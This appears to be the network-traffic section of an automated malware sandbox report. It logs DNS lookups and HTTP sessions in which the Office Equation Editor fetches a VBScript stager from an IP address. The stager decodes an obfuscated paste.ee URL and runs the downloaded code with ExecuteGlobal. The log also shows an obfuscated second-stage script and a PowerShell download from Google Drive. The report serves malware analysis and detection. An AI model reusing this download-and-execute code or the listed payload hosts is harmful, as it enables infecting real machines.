                                                      Oct 24, 2024 08:56:02.015115023 CEST49165443192.168.2.22216.58.212.129
                                                      Oct 24, 2024 08:56:02.033451080 CEST49165443192.168.2.22216.58.212.129
                                                      Oct 24, 2024 08:56:02.033488989 CEST44349165216.58.212.129192.168.2.22
                                                      Oct 24, 2024 08:56:02.034509897 CEST44349165216.58.212.129192.168.2.22
                                                      Oct 24, 2024 08:56:02.037399054 CEST49165443192.168.2.22216.58.212.129
                                                      Oct 24, 2024 08:56:02.079340935 CEST44349165216.58.212.129192.168.2.22
                                                      Oct 24, 2024 08:56:02.856764078 CEST44349165216.58.212.129192.168.2.22
                                                      Oct 24, 2024 08:56:02.856897116 CEST44349165216.58.212.129192.168.2.22
                                                      Oct 24, 2024 08:56:02.856957912 CEST49165443192.168.2.22216.58.212.129
                                                      Oct 24, 2024 08:56:02.856991053 CEST44349165216.58.212.129192.168.2.22
                                                      Oct 24, 2024 08:56:02.857381105 CEST49165443192.168.2.22216.58.212.129
                                                      Oct 24, 2024 08:56:02.857450008 CEST44349165216.58.212.129192.168.2.22
                                                      Oct 24, 2024 08:56:02.857505083 CEST49165443192.168.2.22216.58.212.129
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 24, 2024 08:55:54.648936987 CEST5456253192.168.2.228.8.8.8
                                                      Oct 24, 2024 08:55:54.659709930 CEST53545628.8.8.8192.168.2.22
                                                      Oct 24, 2024 08:55:54.667339087 CEST5291753192.168.2.228.8.8.8
                                                      Oct 24, 2024 08:55:54.674719095 CEST53529178.8.8.8192.168.2.22
                                                      Oct 24, 2024 08:55:59.708153009 CEST6275153192.168.2.228.8.8.8
                                                      Oct 24, 2024 08:55:59.724020004 CEST53627518.8.8.8192.168.2.22
                                                      Oct 24, 2024 08:56:01.151707888 CEST5789353192.168.2.228.8.8.8
                                                      Oct 24, 2024 08:56:01.159456015 CEST53578938.8.8.8192.168.2.22
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 24, 2024 08:55:54.648936987 CEST192.168.2.228.8.8.80xeb5fStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:55:54.667339087 CEST192.168.2.228.8.8.80xe7e2Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:55:59.708153009 CEST192.168.2.228.8.8.80x9bf5Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:56:01.151707888 CEST192.168.2.228.8.8.80x87cdStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 24, 2024 08:55:54.659709930 CEST8.8.8.8192.168.2.220xeb5fNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:55:54.659709930 CEST8.8.8.8192.168.2.220xeb5fNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:55:54.674719095 CEST8.8.8.8192.168.2.220xe7e2No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:55:54.674719095 CEST8.8.8.8192.168.2.220xe7e2No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:55:59.724020004 CEST8.8.8.8192.168.2.220x9bf5No error (0)drive.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:56:01.159456015 CEST8.8.8.8192.168.2.220x87cdNo error (0)drive.usercontent.google.com216.58.212.129A (IP address)IN (0x0001)false
                                                      • paste.ee
                                                      • drive.google.com
                                                      • drive.usercontent.google.com
                                                      • 192.3.216.142
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.2249161192.3.216.142803620C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      TimestampBytes transferredDirectionData
                                                      Oct 24, 2024 08:55:53.603636026 CEST325OUTGET /WEDNESDAY-constraints.vbs HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: 192.3.216.142
                                                      Connection: Keep-Alive
                                                      Oct 24, 2024 08:55:54.275895119 CEST1236INHTTP/1.1 200 OK
                                                      Content-Type: text/vbscript
                                                      Last-Modified: Wed, 23 Oct 2024 18:41:16 GMT
                                                      Accept-Ranges: bytes
                                                      ETag: "a769d1247b25db1:0"
                                                      Server: Microsoft-IIS/10.0
                                                      Date: Thu, 24 Oct 2024 06:55:54 GMT
                                                      Content-Length: 2192
                                                      Data Raw: ff fe 0d 00 0a 00 53 00 65 00 74 00 20 00 66 00 69 00 61 00 64 00 6f 00 75 00 72 00 6f 00 20 00 3d 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 4f 00 62 00 6a 00 65 00 63 00 74 00 28 00 22 00 4d 00 53 00 58 00 4d 00 4c 00 32 00 2e 00 53 00 65 00 72 00 76 00 65 00 72 00 58 00 4d 00 4c 00 48 00 54 00 54 00 50 00 2e 00 36 00 2e 00 30 00 22 00 29 00 0d 00 0a 00 0d 00 0a 00 66 00 6c 00 61 00 6d 00 65 00 6e 00 67 00 61 00 20 00 3d 00 20 00 66 00 72 00 65 00 63 00 68 00 61 00 64 00 61 00 28 00 22 00 a2 25 20 00 1b 32 20 00 e0 27 20 00 cf 31 20 00 fa 23 22 00 29 00 0d 00 0a 00 61 00 6c 00 65 00 67 00 72 00 65 00 20 00 3d 00 20 00 66 00 72 00 65 00 63 00 68 00 61 00 64 00 61 00 28 00 22 00 46 00 a2 25 20 00 1b 32 20 00 e0 27 20 00 cf 31 20 00 fa 23 31 00 a2 25 20 00 1b 32 20 00 e0 27 20 00 cf 31 20 00 fa 23 79 00 a2 25 20 00 1b 32 20 00 e0 27 20 00 cf 31 20 00 fa 23 58 00 a2 25 20 00 1b 32 20 00 e0 27 20 00 cf 31 20 00 fa 23 4b 00 a2 25 20 00 1b 32 20 00 e0 27 20 00 cf 31 20 00 fa 23 2f 00 a2 25 20 00 1b 32 [TRUNCATED]
                                                      Data Ascii: Set fiadouro = CreateObject("MSXML2.ServerXMLHTTP.6.0")flamenga = frechada("% 2 ' 1 #")alegre = frechada("F% 2 ' 1 #1% 2 ' 1 #y% 2 ' 1 #X% 2 ' 1 #K% 2 ' 1 #/% 2 ' 1 #d% 2 ' 1 #/% 2 ' 1 #e% 2 ' 1 #e% 2 ' 1 #.% 2 ' 1 #e% 2 ' 1 #t% 2 ' 1 #s% 2 ' 1 #a% 2 ' 1 #p% 2 ' 1 #/% 2 ' 1 #/% 2 ' 1 #:% 2 ' 1 #p% 2 ' 1 #t% 2 ' 1 #t% 2 ' 1 #h")alegre = ReplaceString(alegre, flamenga, "")fiadouro.Open "GET", alegre, Falsefiadouro.SendExecuteGlobal fiadouro.ResponseTextFunction ReplaceStrin
                                                      Oct 24, 2024 08:55:54.275933027 CEST1186INData Raw: 67 00 28 00 67 00 75 00 61 00 72 00 64 00 61 00 73 00 73 00 6f 00 6c 00 65 00 69 00 72 00 6f 00 2c 00 20 00 61 00 6d 00 61 00 6e 00 74 00 68 00 69 00 6e 00 61 00 2c 00 20 00 64 00 6f 00 64 00 72 00 61 00 6e 00 73 00 29 00 0d 00 0a 00 20 00 20 00
                                                      Data Ascii: g(guardassoleiro, amanthina, dodrans) Dim cabalim cabalim = InStr(guardassoleiro, amanthina) While ca


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.2249162188.114.97.3803756C:\Windows\SysWOW64\wscript.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 24, 2024 08:55:54.681607008 CEST173OUTGET /d/KXy1F HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Language: en-us
                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                      Host: paste.ee
                                                      Oct 24, 2024 08:55:55.388847113 CEST974INHTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 24 Oct 2024 06:55:55 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Location: https://paste.ee/d/KXy1F
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mb%2BTC3mMOl7wapwFmcTO7qm0uT0g55ty8saMBYGPW7SMXv%2B3RZ49X6Ksf6Ha4s5k7W2JgSxO%2Fgf1yd684DrJCAu9KrQIc0aSqFypPt3gLC0Fd%2BuRd%2B0YiPLm%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8d7810622c864793-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1282&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=173&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 61 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: ab<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.2249163188.114.97.34433756C:\Windows\SysWOW64\wscript.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-24 06:55:56 UTC173OUTGET /d/KXy1F HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Language: en-us
                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                      Host: paste.ee
                                                      2024-10-24 06:55:56 UTC1236INHTTP/1.1 200 OK
                                                      Date: Thu, 24 Oct 2024 06:55:56 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: max-age=2592000
                                                      strict-transport-security: max-age=63072000
                                                      x-frame-options: DENY
                                                      x-content-type-options: nosniff
                                                      x-xss-protection: 1; mode=block
                                                      content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w7w6wNVzRJAkDo6mTcVE09pn7a%2B3U%2Bu53oBwHNW2HrKn2SH6J9z%2BUvbJa%2Bptub56x7pkSu02Z6YGII%2BT9VRJDDYZ3CGp1eGfLr44DzQY12TqxSWYzurmy1t68g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8d7810680dafe96e-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-10-24 06:55:56 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 32 32 37 33 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 37 38 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 32 37 38 35 38 37 26 63 77 6e 64 3d 32 34 35 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 62 38 37 62 64 36 34 35 62 61 39 35 32 65 34 33 26 74 73 3d 33 38 38 26 78 3d 30 22 0d 0a 0d 0a
                                                      Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=2273&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=787&delivery_rate=1278587&cwnd=245&unsent_bytes=0&cid=b87bd645ba952e43&ts=388&x=0"
                                                      2024-10-24 06:55:56 UTC1312INData Raw: 31 66 37 66 0d 0a 70 72 69 76 61 74 65 20 66 75 6e 63 74 69 6f 6e 20 76 69 76 61 72 28 63 6f 6e 73 74 69 74 75 69 6e 74 65 2c 20 64 65 6e 74 69 63 75 6c 61 64 6f 2c 20 72 65 61 63 63 69 6f 6e 61 72 69 73 6d 6f 2c 20 65 6e 66 61 72 74 61 72 2c 20 70 6f 6c 79 67 6c 6f 74 74 61 29 0d 0a 20 20 20 20 64 69 6d 20 66 69 6c 74 65 72 0d 0a 20 20 20 20 64 69 6d 20 64 69 61 6c 65 63 74 0d 0a 20 20 20 20 64 69 6d 20 65 0d 0a 20 20 20 20 64 69 6d 20 72 65 73 0d 0a 20 20 20 20 64 69 6d 20 66 6f 72 6d 61 74 74 65 64 54 65 78 74 0d 0a 20 20 20 20 64 69 6d 20 66 6c 61 67 73 0d 0a 20 20 20 20 0d 0a 20 20 20 20 66 6c 61 67 73 20 3d 20 30 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 69 66 20 72 65 61 63 63 69 6f 6e 61 72 69 73 6d 6f 2e 41 72 67 75 6d 65 6e 74 45 78 69 73 74 73 28
                                                      Data Ascii: 1f7fprivate function vivar(constituinte, denticulado, reaccionarismo, enfartar, polyglotta) dim filter dim dialect dim e dim res dim formattedText dim flags flags = 0 if reaccionarismo.ArgumentExists(
                                                      2024-10-24 06:55:56 UTC1369INData Raw: 0d 0a 20 20 20 20 20 20 20 20 64 69 61 6c 65 63 74 20 3d 20 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 62 65 6d 2f 77 73 6d 61 6e 2f 31 2f 57 51 4c 22 0d 0a 20 20 20 20 45 6e 64 20 49 66 0d 0a 0d 0a 20 20 20 20 49 66 20 4c 43 61 73 65 28 64 69 61 6c 65 63 74 29 20 3d 20 22 61 73 73 6f 63 69 61 74 69 6f 6e 22 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 64 69 61 6c 65 63 74 20 3d 20 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 64 6d 74 66 2e 6f 72 67 2f 77 62 65 6d 2f 77 73 6d 61 6e 2f 31 2f 63 69 6d 62 69 6e 64 69 6e 67 2f 41 73 73 6f 63 69 61 74 69 6f 6e 46 69 6c 74 65 72 22 0d 0a 20 20 20 20 45 6e 64 20 49 66 0d 0a 20 20 20 20 49 66 20 4c 43 61 73 65 28 64 69 61 6c 65 63 74 29 20 3d 20 4c 43 61 73 65
                                                      Data Ascii: dialect = "http://schemas.microsoft.com/wbem/wsman/1/WQL" End If If LCase(dialect) = "association" Then dialect = "http://schemas.dmtf.org/wbem/wsman/1/cimbinding/AssociationFilter" End If If LCase(dialect) = LCase
                                                      2024-10-24 06:55:56 UTC1369INData Raw: 5f 45 50 52 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 61 67 73 20 3d 20 66 6c 61 67 73 20 4f 52 20 63 6f 6e 73 74 69 74 75 69 6e 74 65 2e 45 6e 75 6d 65 72 61 74 69 6f 6e 46 6c 61 67 52 65 74 75 72 6e 4f 62 6a 65 63 74 41 6e 64 45 50 52 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 65 6c 73 65 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 53 53 45 52 54 42 4f 4f 4c 20 66 61 6c 73 65 2c 20 22 2d 22 20 26 20 4e 50 41 52 41 5f 52 45 54 55 52 4e 5f 54 59 50 45 20 26 20 22 3a 22 20 26 20 72 65 61 63 63 69 6f 6e 61 72 69 73 6d 6f 2e 41 72 67 75 6d 65 6e 74 28 4e 50 41 52 41 5f 52 45 54 55 52 4e 5f 54 59 50 45 29 20 26 20 22 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 6f 70 74 69 6f 6e 22 0d 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: _EPR flags = flags OR constituinte.EnumerationFlagReturnObjectAndEPR case else ASSERTBOOL false, "-" & NPARA_RETURN_TYPE & ":" & reaccionarismo.Argument(NPARA_RETURN_TYPE) & " is not a valid option"
                                                      2024-10-24 06:55:56 UTC1369INData Raw: 20 64 6f 20 77 68 69 6c 65 20 4e 6f 74 20 65 2e 41 74 45 6e 64 4f 66 53 74 72 65 61 6d 0d 0a 20 20 20 20 20 20 20 20 6f 6e 20 65 72 72 6f 72 20 72 65 73 75 6d 65 20 6e 65 78 74 0d 0a 20 20 20 20 20 20 20 20 72 65 73 20 3d 20 65 2e 52 65 61 64 49 74 65 6d 28 29 0d 0a 20 20 20 20 20 20 20 20 69 66 20 45 72 72 2e 4e 75 6d 62 65 72 20 3d 20 54 5f 4f 20 74 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 73 20 3d 20 65 2e 52 65 61 64 49 74 65 6d 28 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 45 72 72 2e 4e 75 6d 62 65 72 20 3d 20 54 5f 4f 20 74 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 73 20 3d 20 65 2e 52 65 61 64 49 74 65 6d 28 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 6e 64 20 69 66 0d 0a 20 20 20 20 20 20
                                                      Data Ascii: do while Not e.AtEndOfStream on error resume next res = e.ReadItem() if Err.Number = T_O then res = e.ReadItem() if Err.Number = T_O then res = e.ReadItem() end if
                                                      2024-10-24 06:55:56 UTC1369INData Raw: 4c 42 6b 4a 55 20 3d 20 22 5a 4c 57 66 53 76 4b 6f 55 4b 6b 4a 57 6b 47 5a 6f 41 65 6e 6f 78 67 4c 63 4c 6d 57 49 57 69 4c 4e 50 66 71 4c 6b 7a 4c 57 64 6a 6c 4c 74 43 61 50 6b 74 4f 6d 42 55 48 6e 48 4c 65 62 47 61 57 6e 74 51 69 22 0d 0a 69 57 71 55 69 47 4c 6c 55 41 5a 78 69 6b 6f 55 73 73 61 6a 61 72 69 61 48 66 57 5a 55 47 5a 47 63 4c 62 69 4b 47 62 50 69 6d 4b 4c 4c 65 69 70 78 6b 4b 69 7a 50 72 63 68 4f 52 65 7a 71 51 66 47 51 6b 63 6b 4b 52 4c 4c 20 3d 20 22 62 63 43 4b 43 50 50 5a 63 57 6d 49 55 57 50 50 6e 65 4e 5a 6d 50 4a 51 5a 68 71 66 42 6f 76 78 50 50 57 47 47 6e 6e 57 66 50 4b 74 7a 50 70 57 63 41 78 41 72 76 41 49 64 43 66 64 69 6f 6a 67 6a 6d 70 73 22 0d 0a 4b 6b 6a 70 6b 42 70 52 70 70 4b 57 47 63 57 6c 4b 71 7a 4a 69 75 6c 57 4f 47 6d
                                                      Data Ascii: LBkJU = "ZLWfSvKoUKkJWkGZoAenoxgLcLmWIWiLNPfqLkzLWdjlLtCaPktOmBUHnHLebGaWntQi"iWqUiGLlUAZxikoUssajariaHfWZUGZGcLbiKGbPimKLLeipxkKizPrchORezqQfGQkckKRLL = "bcCKCPPZcWmIUWPPneNZmPJQZhqfBovxPPWGGnnWfPKtzPpWcAxArvAIdCfdiojgjmps"KkjpkBpRppKWGcWlKqzJiulWOGm
                                                      2024-10-24 06:55:56 UTC1283INData Raw: 65 51 4e 73 68 57 65 47 57 4c 61 78 6d 43 41 4c 63 22 0d 0a 78 57 48 57 6d 62 57 67 6c 5a 62 66 69 55 62 63 69 4b 62 47 71 4b 6b 66 64 6b 7a 63 41 6a 64 4b 69 57 69 55 70 4b 47 4b 69 4b 51 65 57 71 55 6b 4c 57 69 41 64 53 64 63 66 4c 69 7a 68 57 65 69 6b 6f 6b 6f 20 3d 20 22 4b 68 63 47 64 43 57 41 71 4b 64 4b 6e 4c 41 57 66 41 4b 4e 62 70 4f 4c 63 71 73 62 72 6f 50 6e 4c 6c 6d 4b 63 6d 61 57 6f 72 6b 6e 62 47 71 69 57 71 4c 4c 65 52 68 4c 65 53 63 53 6b 54 65 43 6f 66 7a 65 22 0d 0a 65 4e 70 71 63 4c 4f 71 70 5a 57 4f 62 65 4c 65 62 68 64 64 4c 4e 62 50 69 57 55 4e 69 41 62 50 63 6c 57 63 6d 57 68 42 5a 7a 4c 63 50 6c 57 57 57 66 62 4c 69 4c 65 42 71 7a 43 57 6b 66 57 5a 63 62 4b 6b 20 3d 20 22 57 4b 6a 47 4c 57 71 50 43 6b 4b 64 7a 47 69 74 63 4c 6f 61
                                                      Data Ascii: eQNshWeGWLaxmCALc"xWHWmbWglZbfiUbciKbGqKkfdkzcAjdKiWiUpKGKiKQeWqUkLWiAdSdcfLizhWeikoko = "KhcGdCWAqKdKnLAWfAKNbpOLcqsbroPnLlmKcmaWorknbGqiWqLLeRhLeScSkTeCofze"eNpqcLOqpZWObeLebhddLNbPiWUNiAbPclWcmWhBZzLcPlWWWfbLiLeBqzCWkfWZcbKk = "WKjGLWqPCkKdzGitcLoa
                                                      2024-10-24 06:55:56 UTC1369INData Raw: 32 30 30 30 0d 0a 65 61 62 47 65 7a 70 47 6d 4c 6f 54 41 6b 57 4c 5a 4c 6b 69 57 41 5a 57 4c 62 69 41 61 6a 22 0d 0a 62 4c 69 67 61 68 43 68 47 42 4c 76 70 41 61 57 47 75 69 41 4e 73 4c 74 4b 47 64 69 57 73 61 6a 61 72 69 61 52 74 69 57 50 4e 63 66 6f 73 5a 57 4c 62 6d 62 4b 43 67 47 47 4c 65 68 50 43 4a 6f 69 50 68 43 5a 68 55 75 49 20 3d 20 22 69 6f 4b 47 6d 4e 53 74 62 6b 57 68 78 64 4e 62 53 7a 74 5a 41 4b 55 6f 69 62 64 42 4b 68 63 47 73 6b 64 4c 5a 57 47 4e 4f 4f 48 4c 62 75 52 42 72 4b 47 65 73 6d 52 61 7a 6f 6b 6f 55 73 55 47 4e 6e 66 4b 22 0d 0a 78 47 63 7a 6f 75 6e 5a 65 75 4c 57 4c 68 57 57 62 72 4b 4e 76 57 76 66 65 4c 6b 55 70 57 57 4c 62 57 5a 54 4c 43 57 6b 63 69 4b 72 47 69 53 6d 4c 65 61 57 5a 7a 6b 7a 65 6f 52 6d 47 69 62 73 76 4a 75 41
                                                      Data Ascii: 2000eabGezpGmLoTAkWLZLkiWAZWLbiAaj"bLigahChGBLvpAaWGuiANsLtKGdiWsajariaRtiWPNcfosZWLbmbKCgGGLehPCJoiPhCZhUuI = "ioKGmNStbkWhxdNbSztZAKUoibdBKhcGskdLZWGNOOHLbuRBrKGesmRazokoUsUGNnfK"xGczounZeuLWLhWWbrKNvWvfeLkUpWWLbWZTLCWkciKrGiSmLeaWZzkzeoRmGibsvJuA
                                                      2024-10-24 06:55:56 UTC1369INData Raw: 4c 54 61 6c 55 47 63 6f 6c 78 4f 6b 47 63 6b 4f 4e 47 78 4c 57 66 47 51 66 70 48 69 64 6a 55 62 41 6d 63 73 70 6c 6b 69 57 6b 6d 4f 6b 4b 68 20 3d 20 22 4c 65 62 57 66 47 4c 4f 4c 4c 66 4e 54 43 62 6d 67 65 51 74 41 4c 4e 6c 6d 4b 41 62 69 4b 76 50 4e 6b 63 55 75 57 63 74 42 53 69 7a 41 76 57 69 78 5a 57 6b 47 75 64 7a 55 7a 63 55 57 4b 63 49 7a 47 4b 57 22 0d 0a 63 52 68 6d 64 42 57 52 6f 6c 6c 41 57 6b 6d 7a 57 75 4c 69 55 6d 55 78 75 5a 55 4f 4a 6d 72 48 74 69 4c 4c 65 52 57 4b 6a 4e 7a 4c 7a 7a 63 52 69 54 73 73 61 6a 61 72 69 61 69 69 4c 63 53 7a 70 4f 7a 63 6e 41 61 66 47 20 3d 20 22 68 42 57 4c 41 47 71 75 6e 68 5a 4b 51 57 6e 69 72 64 68 57 65 62 4b 57 68 6e 4b 4c 6f 78 54 74 6d 57 57 4c 42 49 7a 6e 6e 52 65 4e 55 63 49 73 57 68 74 6d 75 66 6b 4c
                                                      Data Ascii: LTalUGcolxOkGckONGxLWfGQfpHidjUbAmcsplkiWkmOkKh = "LebWfGLOLLfNTCbmgeQtALNlmKAbiKvPNkcUuWctBSizAvWixZWkGudzUzcUWKcIzGKW"cRhmdBWRollAWkmzWuLiUmUxuZUOJmrHtiLLeRWKjNzLzzcRiTssajariaiiLcSzpOzcnAafG = "hBWLAGqunhZKQWnirdhWebKWhnKLoxTtmWWLBIznnReNUcIsWhtmufkL
                                                      2024-10-24 06:55:56 UTC1369INData Raw: 55 55 4c 6f 4b 4c 61 4c 57 57 57 57 71 49 57 67 63 4e 6c 4b 69 70 41 72 7a 62 61 42 7a 6b 4c 55 5a 4c 65 4b 52 47 4b 69 50 47 64 5a 75 70 57 70 57 57 6c 68 22 0d 0a 4c 52 61 57 63 51 68 53 66 6b 55 63 71 76 61 66 63 63 4e 68 4b 47 70 52 7a 57 41 41 57 63 41 47 68 49 47 6b 4c 64 61 5a 4e 57 72 6b 43 57 4c 64 47 57 6e 47 4b 4b 6d 4c 70 69 6c 63 7a 69 57 69 63 4e 57 41 20 3d 20 22 4e 57 64 66 49 64 4b 6f 69 55 52 64 47 67 63 70 4a 66 4f 47 5a 73 55 69 6b 69 62 55 6f 47 53 47 69 4c 4c 57 69 6c 4b 52 4b 43 69 4b 7a 61 78 78 48 70 50 4c 5a 69 64 55 4c 66 69 4c 4f 50 47 69 48 4b 6d 4c 22 0d 0a 6b 66 63 61 57 69 75 69 4b 70 65 61 6d 4c 70 4a 65 6f 6f 6b 4e 4b 70 49 69 78 57 55 69 51 55 69 4c 6e 55 4c 57 6b 51 70 6b 63 63 4b 75 7a 4c 4e 64 57 62 6a 55 7a 63 69 4b
                                                      Data Ascii: UULoKLaLWWWWqIWgcNlKipArzbaBzkLUZLeKRGKiPGdZupWpWWlh"LRaWcQhSfkUcqvafccNhKGpRzWAAWcAGhIGkLdaZNWrkCWLdGWnGKKmLpilcziWicNWA = "NWdfIdKoiURdGgcpJfOGZsUikibUoGSGiLLWilKRKCiKzaxxHpPLZidULfiLOPGiHKmL"kfcaWiuiKpeamLpJeookNKpIixWUiQUiLnULWkQpkccKuzLNdWbjUzciK


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.2249164216.58.212.1744433932C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-24 06:56:00 UTC121OUTGET /uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp HTTP/1.1
                                                      Host: drive.google.com
                                                      Connection: Keep-Alive
                                                      2024-10-24 06:56:01 UTC1319INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Thu, 24 Oct 2024 06:56:00 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-6Uty7aq5l9O4iPvJpqL69g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
